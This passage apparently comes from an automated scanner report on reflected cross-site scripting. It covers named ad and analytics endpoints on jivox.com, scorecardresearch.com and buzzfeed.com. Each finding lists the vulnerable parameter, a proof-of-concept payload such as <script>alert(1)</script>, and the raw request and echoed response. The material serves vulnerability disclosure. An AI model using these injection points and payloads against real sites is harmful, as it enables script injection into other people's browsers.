GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
oPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&jvxSessionId=1307962949.7885&expandedUnit=1&viewLayout=1f430e";alert(1)//86c1c56c0d3&adUnitWidth=&adUnitHeight=";

return slideOutLargeUnit(playerObject.playerExInteractivityDomReference.id, interactivityUrl, "expandedUnit");
}

    function setLargeAdUn
...[SNIP]...

4.96. http://as.jivox.com/unit/jivox_unit_tags.php [mouseAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the mouseAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce2f"%3balert(1)//55b8c35db09 was submitted in the mouseAction parameter. This input was echoed as fce2f";alert(1)//55b8c35db09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOverfce2f"%3balert(1)//55b8c35db09 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:37 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32438


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
bject.playerExCloseInteractivityBtnDomReference, "click", function(){playerObject.slideInLargeAdUnit();}, false);
           }
               
               attachEventListener(playerObject.playBtnContainerDomReference, "mouseoverfce2f";alert(1)//55b8c35db09", function(e){playerObject.slideOutLargeAdUnit('19628','24bbcd13d37379');}, false);
       
               
               attachEventListener(playerObject.playerExInteractivityDomReference, "mouseover", function(e){playerObjec
...[SNIP]...

4.97. http://as.jivox.com/unit/jivox_unit_tags.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fcf3"%3balert(1)//d36d2acaf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fcf3";alert(1)//d36d2acaf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver&9fcf3"%3balert(1)//d36d2acaf3=1 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:37 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32395


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
EzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.nealtire.com%2F&mouseAction=mouseOver&9fcf3";alert(1)//d36d2acaf3=1&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&jvxSessionId=1307962957.6909&expandedUnit=1&viewLa
...[SNIP]...

4.98. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 724da"%3balert(1)//2a404fbdcee was submitted in the objectName parameter. This input was echoed as 724da";alert(1)//2a404fbdcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894724da"%3balert(1)//2a404fbdcee&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 33059


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
return document.getElementById(movieName);
}
};
   
}

if(typeof(jivoxUnit) != "undefined"){
var jvxAdPlayer_894724da";alert(1)//2a404fbdcee = new jivoxUnit();
var jvxAdPlayer_894724da";alert(1)//2a404fbdceeflashVersion = jvxAdPlayer_894724da";alert(1)//2a404fbdcee.getFlashVersion();
var jvxAdPlayer_894724da";alert(1)//2a404fbdceeversions = jvxAdPlayer_894724da";alert(1)//2a404fbdceeflashVersion.split(','
...[SNIP]...

4.99. http://as.jivox.com/unit/jivox_unit_tags.php [objectName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11a92%3balert(1)//27abb62e794 was submitted in the objectName parameter. This input was echoed as 11a92;alert(1)//27abb62e794 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_89411a92%3balert(1)//27abb62e794&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 33030


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
avigator.appName.indexOf("Microsoft Internet")!=-1)
{
return document.getElementById(movieName);
}
};
   
}

if(typeof(jivoxUnit) != "undefined"){
var jvxAdPlayer_89411a92;alert(1)//27abb62e794 = new jivoxUnit();
var jvxAdPlayer_89411a92;alert(1)//27abb62e794flashVersion = jvxAdPlayer_89411a92;alert(1)//27abb62e794.getFlashVersion();
var jvxAdPlayer_89411a92;alert(1)//27abb62e794versions = j
...[SNIP]...

4.100. http://as.jivox.com/unit/jivox_unit_tags.php [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7db45'%3balert(1)//cc2b6fb18db was submitted in the siteId parameter. This input was echoed as 7db45';alert(1)//cc2b6fb18db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d373797db45'%3balert(1)//cc2b6fb18db&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:30 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32263


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
<a href="http://as.jivox.com/player/proxy.php?campaignId=19628&siteId=24bbcd13d373797db45';alert(1)//cc2b6fb18db&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxha
...[SNIP]...

4.101. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f78f6<script>alert(1)</script>46dbba33e76 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7f78f6<script>alert(1)</script>46dbba33e76&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:22 GMT
Date: Mon, 13 Jun 2011 11:01:22 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7f78f6<script>alert(1)</script>46dbba33e76", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.102. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9a43a<script>alert(1)</script>89e036b59b8 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=9a43a<script>alert(1)</script>89e036b59b8&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"9a43a<script>alert(1)</script>89e036b59b8", c16:"", r:""});



4.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 74de2<script>alert(1)</script>f5c8345fe6a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=596488874de2<script>alert(1)</script>f5c8345fe6a&c3=2&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:24 GMT
Date: Mon, 13 Jun 2011 11:01:24 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"596488874de2<script>alert(1)</script>f5c8345fe6a", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload eae72<script>alert(1)</script>592488c2035 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2eae72<script>alert(1)</script>592488c2035&c4=&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:24 GMT
Date: Mon, 13 Jun 2011 11:01:24 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2eae72<script>alert(1)</script>592488c2035", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 390ca<script>alert(1)</script>b602141498d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=390ca<script>alert(1)</script>b602141498d&c5=&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:31 GMT
Date: Mon, 13 Jun 2011 11:01:31 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"390ca<script>alert(1)</script>b602141498d", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1963a<script>alert(1)</script>ee868e885cc was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=1963a<script>alert(1)</script>ee868e885cc&c6=&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"1963a<script>alert(1)</script>ee868e885cc", c6:"", c10:"", c15:"", c16:"", r:""});



4.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9a60f<script>alert(1)</script>a2e90c8fffe was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=9a60f<script>alert(1)</script>a2e90c8fffe&c15=&tm=487641 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 20 Jun 2011 11:01:33 GMT
Date: Mon, 13 Jun 2011 11:01:33 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"9a60f<script>alert(1)</script>a2e90c8fffe", c10:"", c15:"", c16:"", r:""});



4.108. http://ct.buzzfeed.com/wd/UserWidget [or parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the or request parameter is copied into the HTML document as plain text between tags. The payload 789e4<script>alert(1)</script>93295794946 was submitted in the or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=ugo&to=1&or=vb789e4<script>alert(1)</script>93295794946&wid=1&cb=1307963919106 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
